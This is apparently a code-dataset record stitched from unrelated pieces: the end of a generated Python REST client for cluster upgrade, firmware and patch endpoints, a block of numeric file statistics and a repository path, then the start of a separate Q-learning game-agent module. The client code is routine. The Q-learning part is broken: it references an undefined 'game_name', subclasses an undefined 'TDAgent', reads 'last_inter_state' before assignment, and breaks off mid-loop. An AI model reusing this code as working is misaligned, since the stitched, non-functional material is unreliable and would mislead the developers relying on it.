    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.delete_cluster_patch_patch_with_http_info(cluster_patch_patch_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str cluster_patch_patch_id: Uninstall a patch. (required)
    :param bool skip_version_check: Bypass version checks. Defaults to false.
    :param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
    :param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
    :param bool simultaneous: Uninstall the patch on all nodes at once. Defaults to false.
    :param bool rolling: Install the patch on one node at a time. Defaults to true.
    :param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
    :return: None
    """
    all_params = [
        'cluster_patch_patch_id',
        'skip_version_check',
        'skip_conflict_check',
        'skip_restricted_check',
        'simultaneous',
        'rolling',
        'skip_dependency_check',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_cluster_patch_patch" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_patch_patch_id') is None:
        raise ValueError("Missing the required parameter `cluster_patch_patch_id` when calling `delete_cluster_patch_patch`")  # noqa: E501

    # The patch id is interpolated into the URL template below.
    path_params = {'ClusterPatchPatchId': params['cluster_patch_patch_id']}  # noqa: E501

    # Optional toggles travel as query parameters, in declaration order.
    query_params = [
        (name, params[name])
        for name in ('skip_version_check', 'skip_conflict_check',
                     'skip_restricted_check', 'simultaneous',
                     'rolling', 'skip_dependency_check')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/7/upgrade/cluster/patch/patches/{ClusterPatchPatchId}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_cluster_firmware_progress(self, **kwargs):  # noqa: E501
    """get_cluster_firmware_progress  # noqa: E501

    Cluster wide firmware upgrade status info.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.get_cluster_firmware_progress(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: ClusterFirmwareProgress
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.get_cluster_firmware_progress_with_http_info(**kwargs)  # noqa: E501
def get_cluster_firmware_progress_with_http_info(self, **kwargs):  # noqa: E501
    """get_cluster_firmware_progress  # noqa: E501

    Cluster wide firmware upgrade status info.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.get_cluster_firmware_progress_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: ClusterFirmwareProgress
    """
    all_params = [
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_firmware_progress" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/3/upgrade/cluster/firmware/progress', 'GET',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterFirmwareProgress',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_cluster_firmware_status(self, **kwargs):  # noqa: E501
    """get_cluster_firmware_status  # noqa: E501

    The firmware status for the cluster.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.get_cluster_firmware_status(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param bool refresh: Re-gather firmware status. Default is false.
    :param bool devices: Show devices. If false, this returns an empty list. Default is false.
    :param bool package: Show package. If false, this returns an empty list. Default is false.
    :return: ClusterFirmwareStatus
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.get_cluster_firmware_status_with_http_info(**kwargs)  # noqa: E501
def get_cluster_firmware_status_with_http_info(self, **kwargs):  # noqa: E501
    """get_cluster_firmware_status  # noqa: E501

    The firmware status for the cluster.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.get_cluster_firmware_status_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param bool refresh: Re-gather firmware status. Default is false.
    :param bool devices: Show devices. If false, this returns an empty list. Default is false.
    :param bool package: Show package. If false, this returns an empty list. Default is false.
    :return: ClusterFirmwareStatus
    """
    all_params = [
        'refresh',
        'devices',
        'package',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_firmware_status" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    # Optional toggles travel as query parameters, in declaration order.
    query_params = [
        (name, params[name])
        for name in ('refresh', 'devices', 'package')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/3/upgrade/cluster/firmware/status', 'GET',
        {},  # no path parameters
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterFirmwareStatus',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_cluster_node(self, cluster_node_id, **kwargs):  # noqa: E501
    """get_cluster_node  # noqa: E501

    The node details useful during an upgrade or assessment.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :param int cluster_node_id: The node details useful during an upgrade or assessment. (required)
    :return: ClusterNodes
    """
    # This convenience wrapper always wants just the payload, so both the
    # sync and async paths reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.get_cluster_node_with_http_info(cluster_node_id, **kwargs)  # noqa: E501
def get_cluster_node_with_http_info(self, cluster_node_id, **kwargs):  # noqa: E501
    """get_cluster_node  # noqa: E501

    The node details useful during an upgrade or assessment.  # noqa: E501
    Synchronous by default; pass async_req=True for the request thread.

    :param async_req bool
    :param int cluster_node_id: The node details useful during an upgrade or assessment. (required)
    :return: ClusterNodes
    """
    # Reject any keyword argument this endpoint does not understand.
    all_params = ['cluster_node_id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_node" % key
            )
        params[key] = val
    del params['kwargs']
    # The path parameter is mandatory.
    if params.get('cluster_node_id') is None:
        raise ValueError("Missing the required parameter `cluster_node_id` when calling `get_cluster_node`")  # noqa: E501

    path_params = {'ClusterNodeId': params['cluster_node_id']}  # noqa: E501
    query_params = []
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/3/upgrade/cluster/nodes/{ClusterNodeId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterNodes',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_cluster_nodes(self, **kwargs):  # noqa: E501
    """get_cluster_nodes  # noqa: E501

    View information about nodes during an upgrade, rollback, or pre-upgrade assessment.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :return: ClusterNodesExtended
    """
    # Only the payload is wanted here, so both the sync and async paths
    # reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.get_cluster_nodes_with_http_info(**kwargs)  # noqa: E501
def get_cluster_nodes_with_http_info(self, **kwargs):  # noqa: E501
    """get_cluster_nodes  # noqa: E501

    View information about nodes during an upgrade, rollback, or pre-upgrade assessment.  # noqa: E501
    Synchronous by default; pass async_req=True for the request thread.

    :param async_req bool
    :return: ClusterNodesExtended
    """
    # This endpoint takes no query parameters; only framework kwargs allowed.
    all_params = ['async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_nodes" % key
            )
        params[key] = val
    del params['kwargs']

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/3/upgrade/cluster/nodes', 'GET',
        {},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterNodesExtended',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_cluster_patch_patch(self, cluster_patch_patch_id, **kwargs):  # noqa: E501
    """get_cluster_patch_patch  # noqa: E501

    View a single patch.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :param str cluster_patch_patch_id: View a single patch. (required)
    :param bool local: View patch information on local node only.
    :param str location: Path location of patch file.
    :return: ClusterPatchPatches
    """
    # Only the payload is wanted; both sync and async paths reduce to a
    # single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.get_cluster_patch_patch_with_http_info(cluster_patch_patch_id, **kwargs)  # noqa: E501
def get_cluster_patch_patch_with_http_info(self, cluster_patch_patch_id, **kwargs):  # noqa: E501
    """get_cluster_patch_patch  # noqa: E501

    View a single patch.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_cluster_patch_patch_with_http_info(cluster_patch_patch_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str cluster_patch_patch_id: View a single patch. (required)
    :param bool local: View patch information on local node only.
    :param str location: Path location of patch file.
    :return: ClusterPatchPatches
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted keyword arguments for this endpoint.
    all_params = ['cluster_patch_patch_id', 'local', 'location']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Snapshot of the call's local variables; kwargs are merged in so all
    # parameters can be read uniformly via `params` below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_patch_patch" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'cluster_patch_patch_id' is set
    if ('cluster_patch_patch_id' not in params or
            params['cluster_patch_patch_id'] is None):
        raise ValueError("Missing the required parameter `cluster_patch_patch_id` when calling `get_cluster_patch_patch`")  # noqa: E501
    # Server-side limit on the `location` path length.
    if ('location' in params and
            len(params['location']) > 4096):
        raise ValueError("Invalid value for parameter `location` when calling `get_cluster_patch_patch`, length must be less than or equal to `4096`")  # noqa: E501
    # NOTE(review): len() can never be negative, so this generated check is
    # dead code; kept for fidelity with the generator output.
    if ('location' in params and
            len(params['location']) < 0):
        raise ValueError("Invalid value for parameter `location` when calling `get_cluster_patch_patch`, length must be greater than or equal to `0`")  # noqa: E501
    collection_formats = {}
    # Path parameter substituted into the URL template below.
    path_params = {}
    if 'cluster_patch_patch_id' in params:
        path_params['ClusterPatchPatchId'] = params['cluster_patch_patch_id']  # noqa: E501
    # Optional query-string parameters.
    query_params = []
    if 'local' in params:
        query_params.append(('local', params['local']))  # noqa: E501
    if 'location' in params:
        query_params.append(('location', params['location']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['basicAuth']  # noqa: E501
    return self.api_client.call_api(
        '/platform/7/upgrade/cluster/patch/patches/{ClusterPatchPatchId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ClusterPatchPatches',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_upgrade_cluster(self, **kwargs):  # noqa: E501
    """get_upgrade_cluster  # noqa: E501

    Cluster wide upgrade status info.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :return: UpgradeCluster
    """
    # Only the payload is wanted; both sync and async paths reduce to a
    # single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.get_upgrade_cluster_with_http_info(**kwargs)  # noqa: E501
def get_upgrade_cluster_with_http_info(self, **kwargs):  # noqa: E501
    """get_upgrade_cluster  # noqa: E501

    Cluster wide upgrade status info.  # noqa: E501
    Synchronous by default; pass async_req=True for the request thread.

    :param async_req bool
    :return: UpgradeCluster
    """
    # This endpoint takes no query parameters; only framework kwargs allowed.
    all_params = ['async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_upgrade_cluster" % key
            )
        params[key] = val
    del params['kwargs']

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/7/upgrade/cluster', 'GET',
        {},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='UpgradeCluster',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def list_cluster_patch_patches(self, **kwargs):  # noqa: E501
    """list_cluster_patch_patches  # noqa: E501

    List all patches.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :param str sort: The field that will be used for sorting.
    :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
    :param int limit: Return no more than this many results at once (see resume).
    :param str location: Path location of patch file.
    :param bool local: View patches on the local node only.
    :param str dir: The direction of the sort.
    :return: ClusterPatchPatchesExtended
    """
    # Only the payload is wanted; both sync and async paths reduce to a
    # single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.list_cluster_patch_patches_with_http_info(**kwargs)  # noqa: E501
def list_cluster_patch_patches_with_http_info(self, **kwargs):  # noqa: E501
    """list_cluster_patch_patches  # noqa: E501

    List all patches.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_cluster_patch_patches_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str sort: The field that will be used for sorting.
    :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
    :param int limit: Return no more than this many results at once (see resume).
    :param str location: Path location of patch file.
    :param bool local: View patches on the local node only.
    :param str dir: The direction of the sort.
    :return: ClusterPatchPatchesExtended
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted keyword arguments for this endpoint.
    all_params = ['sort', 'resume', 'limit', 'location', 'local', 'dir']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Snapshot of the call's local variables; kwargs are merged in so all
    # parameters can be read uniformly via `params` below.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_cluster_patch_patches" % key
            )
        params[key] = val
    del params['kwargs']
    # Generated length/range validations; checks of the form `len(...) < 0`
    # can never fire but are kept for fidelity with the generator output.
    if ('sort' in params and
            len(params['sort']) > 255):
        raise ValueError("Invalid value for parameter `sort` when calling `list_cluster_patch_patches`, length must be less than or equal to `255`")  # noqa: E501
    if ('sort' in params and
            len(params['sort']) < 0):
        raise ValueError("Invalid value for parameter `sort` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`")  # noqa: E501
    if ('resume' in params and
            len(params['resume']) > 8192):
        raise ValueError("Invalid value for parameter `resume` when calling `list_cluster_patch_patches`, length must be less than or equal to `8192`")  # noqa: E501
    if ('resume' in params and
            len(params['resume']) < 0):
        raise ValueError("Invalid value for parameter `resume` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`")  # noqa: E501
    # `limit` must fit an unsigned 32-bit value and be at least 1.
    if 'limit' in params and params['limit'] > 4294967295:  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `list_cluster_patch_patches`, must be a value less than or equal to `4294967295`")  # noqa: E501
    if 'limit' in params and params['limit'] < 1:  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `list_cluster_patch_patches`, must be a value greater than or equal to `1`")  # noqa: E501
    if ('location' in params and
            len(params['location']) > 4096):
        raise ValueError("Invalid value for parameter `location` when calling `list_cluster_patch_patches`, length must be less than or equal to `4096`")  # noqa: E501
    if ('location' in params and
            len(params['location']) < 0):
        raise ValueError("Invalid value for parameter `location` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`")  # noqa: E501
    if ('dir' in params and
            len(params['dir']) < 0):
        raise ValueError("Invalid value for parameter `dir` when calling `list_cluster_patch_patches`, length must be greater than or equal to `0`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    # Optional query-string parameters, forwarded only when supplied.
    query_params = []
    if 'sort' in params:
        query_params.append(('sort', params['sort']))  # noqa: E501
    if 'resume' in params:
        query_params.append(('resume', params['resume']))  # noqa: E501
    if 'limit' in params:
        query_params.append(('limit', params['limit']))  # noqa: E501
    if 'location' in params:
        query_params.append(('location', params['location']))  # noqa: E501
    if 'local' in params:
        query_params.append(('local', params['local']))  # noqa: E501
    if 'dir' in params:
        query_params.append(('dir', params['dir']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['basicAuth']  # noqa: E501
    return self.api_client.call_api(
        '/platform/7/upgrade/cluster/patch/patches', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ClusterPatchPatchesExtended',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_cluster_unblock(self, cluster_unblock, **kwargs):  # noqa: E501
    """update_cluster_unblock  # noqa: E501

    Unblock parallel upgrade.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :param ClusterUnblock cluster_unblock: (required)
    :return: None
    """
    # Only the payload is wanted; both sync and async paths reduce to a
    # single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.update_cluster_unblock_with_http_info(cluster_unblock, **kwargs)  # noqa: E501
def update_cluster_unblock_with_http_info(self, cluster_unblock, **kwargs):  # noqa: E501
    """update_cluster_unblock  # noqa: E501

    Unblock parallel upgrade.  # noqa: E501
    Synchronous by default; pass async_req=True for the request thread.

    :param async_req bool
    :param ClusterUnblock cluster_unblock: (required)
    :return: None
    """
    # Reject any keyword argument this endpoint does not understand.
    all_params = ['cluster_unblock', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_cluster_unblock" % key
            )
        params[key] = val
    del params['kwargs']
    # The request body is mandatory.
    if params.get('cluster_unblock') is None:
        raise ValueError("Missing the required parameter `cluster_unblock` when calling `update_cluster_unblock`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/9/upgrade/cluster/unblock', 'PUT',
        {},
        [],
        header_params,
        body=params['cluster_unblock'],
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_cluster_upgrade(self, cluster_upgrade, **kwargs):  # noqa: E501
    """update_cluster_upgrade  # noqa: E501

    Add nodes to a running upgrade.  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the parsed response.

    :param async_req bool
    :param ClusterUpgrade cluster_upgrade: (required)
    :return: None
    """
    # Only the payload is wanted; both sync and async paths reduce to a
    # single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.update_cluster_upgrade_with_http_info(cluster_upgrade, **kwargs)  # noqa: E501
def update_cluster_upgrade_with_http_info(self, cluster_upgrade, **kwargs):  # noqa: E501
    """update_cluster_upgrade  # noqa: E501

    Add nodes to a running upgrade.  # noqa: E501
    Synchronous by default; pass async_req=True for the request thread.

    :param async_req bool
    :param ClusterUpgrade cluster_upgrade: (required)
    :return: None
    """
    # Reject any keyword argument this endpoint does not understand.
    all_params = ['cluster_upgrade', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_cluster_upgrade" % key
            )
        params[key] = val
    del params['kwargs']
    # The request body is mandatory.
    if params.get('cluster_upgrade') is None:
        raise ValueError("Missing the required parameter `cluster_upgrade` when calling `update_cluster_upgrade`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/9/upgrade/cluster/upgrade', 'PUT',
        {},
        [],
        header_params,
        body=params['cluster_upgrade'],
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 42.656367
| 183
| 0.633602
| 11,845
| 102,162
| 5.164458
| 0.024483
| 0.049695
| 0.021055
| 0.027071
| 0.977294
| 0.964707
| 0.950043
| 0.930574
| 0.917905
| 0.907508
| 0
| 0.016812
| 0.280956
| 102,162
| 2,394
| 184
| 42.674185
| 0.815938
| 0.323966
| 0
| 0.759785
| 1
| 0.008442
| 0.226
| 0.087395
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036071
| false
| 0
| 0.00307
| 0
| 0.092863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c709941bf1f52dec018b7f9ee9f67535a956980
| 9,682
|
py
|
Python
|
comgames/AI/TD.py
|
houluy/comgames
|
aa2bcb6ef0d16807bab0eebcfe9a4818aebc0c3b
|
[
"MIT"
] | 2
|
2018-02-21T16:00:20.000Z
|
2018-06-18T10:22:21.000Z
|
comgames/AI/TD.py
|
houluy/comgames
|
aa2bcb6ef0d16807bab0eebcfe9a4818aebc0c3b
|
[
"MIT"
] | null | null | null |
comgames/AI/TD.py
|
houluy/comgames
|
aa2bcb6ef0d16807bab0eebcfe9a4818aebc0c3b
|
[
"MIT"
] | null | null | null |
import random
from collections import defaultdict, UserDict
import logging
import pickle
import pathlib
import json
import src.game
from .config import config
from .agent import Agent
class Value(UserDict):
    """State-value table keyed by the string form of a state.

    Stores each state under its canonical string key and only accepts an
    assignment when it improves on the value already recorded (i.e. the
    table keeps the maximum value ever seen for a state).
    """

    def _state2str(self, state):
        """Canonical key: cells concatenated, e.g. [1, 0, 2] -> "102"."""
        return ''.join(str(x) for x in state)

    def __setitem__(self, key, value):
        """Record `value` for `key` only if it beats the stored value.

        BUG FIX: the previous revision compared against the *raw* key while
        storing under the stringified key, so every assignment raised
        KeyError (nothing was ever stored under the raw key). Compare and
        store under the same canonical string key, treating a missing entry
        as -inf so the first assignment always succeeds.
        """
        skey = self._state2str(key)
        if self.data.get(skey, float('-inf')) < value:
            super().__setitem__(skey, value)
class QLearning(TDAgent):
    """Tabular Q-learning driver for a two-player board game.

    Trains an offensive and a defensive agent against each other with an
    epsilon-greedy policy and decaying epsilon, then pickles the merged Q
    table and dumps per-episode Q sums as JSON.
    NOTE(review): `TDAgent` is not defined in this module's visible imports —
    confirm where it comes from.
    """

    def __init__(self, new=False):
        # NOTE(review): `game_name` is not defined in this scope — this looks
        # like it should be an attribute set by the base class (e.g.
        # self.game_name); as written it raises NameError. TODO confirm.
        super().__init__(new)
        self.params = config.get(game_name).get("Q_learning")
        self.num_episodes = self.params.get('num_episodes')
        self.min_epsilon = self.params.get("min_epsilon")
        self.epsilon = self.params.get("epsilon")
        self.epsilon_decay = self.params.get("epsilon_decay")

    def update_Q(self, state, action, reward, next_state, next_actions):
        """One Q-learning backup: target = reward + gamma * max_a Q(s', a).

        `self.Q`, `self.gamma` and `self.update` are presumably provided by
        TDAgent — confirm against that class.
        """
        # Manual max over the successor state's action values.
        for ind, a in enumerate(next_actions):
            if ind == 0:
                max_nQ = self.Q[(next_state, a)]
            else:
                temp_Q = self.Q[(next_state, a)]
                if temp_Q > max_nQ:
                    max_nQ = temp_Q
        target = reward + self.gamma * max_nQ
        self.update(state, action, target)

    def train(self):
        """Self-play training loop; persists Q tables and Q-sum histories."""
        # Records all Q values
        offensive_Q_list = [0 for _ in range(self.num_episodes)]
        defensive_Q_list = [0 for _ in range(self.num_episodes)]
        Q_list = [0 for _ in range(self.num_episodes)]
        # Records the winning status
        # NOTE(review): these counters are reported at the end but never
        # incremented anywhere in this loop — confirm intended.
        offensive_win = 0
        defensive_win = 0
        tie_count = 0
        # Two agents
        agent_off = TDAgent(self.game_name)
        agent_def = TDAgent(self.game_name)
        for e in range(self.num_episodes):
            state = self.env.observation()
            done = 0
            game_round = 0
            while done == 0:
                game_round += 1
                actions = self.env.actions(state)
                action_off = agent_off.epsilon_greedy(state, actions, self.epsilon)
                intermediate_state, reward_off, done, info = self.env.step(action_off)
                if done:  # offensive agent wins or tie
                    reward_def = -reward_off
                    agent_off.Q.update(state, action_off, intermediate_state, reward_off)
                    agent_def.Q.update(last_inter_state, action_def, intermediate_state, reward_def)
                else:  # turn of defensive agent
                    actions = self.env.actions(intermediate_state)
                    reward_def = reward_off
                    # Need to update the Q value of the defensive agent after
                    # the first round (no defensive transition exists yet in
                    # round 1).
                    if game_round > 1:
                        agent_def.Q.update(last_inter_state, action_def, intermediate_state, reward_def, actions)
                    game_round += 1
                    action_def = agent_def.epsilon_greedy(intermediate_state, actions, self.epsilon)
                    next_state, reward_def, done, info = self.env.step(action_def)
                    if done:  # defensive agent wins or tie
                        reward_off = -reward_def
                        agent_def.Q.update(intermediate_state, action_def, next_state, reward_def)
                        agent_off.Q.update(state, action_off, next_state, reward_off)
                    else:
                        actions = self.env.actions(next_state)
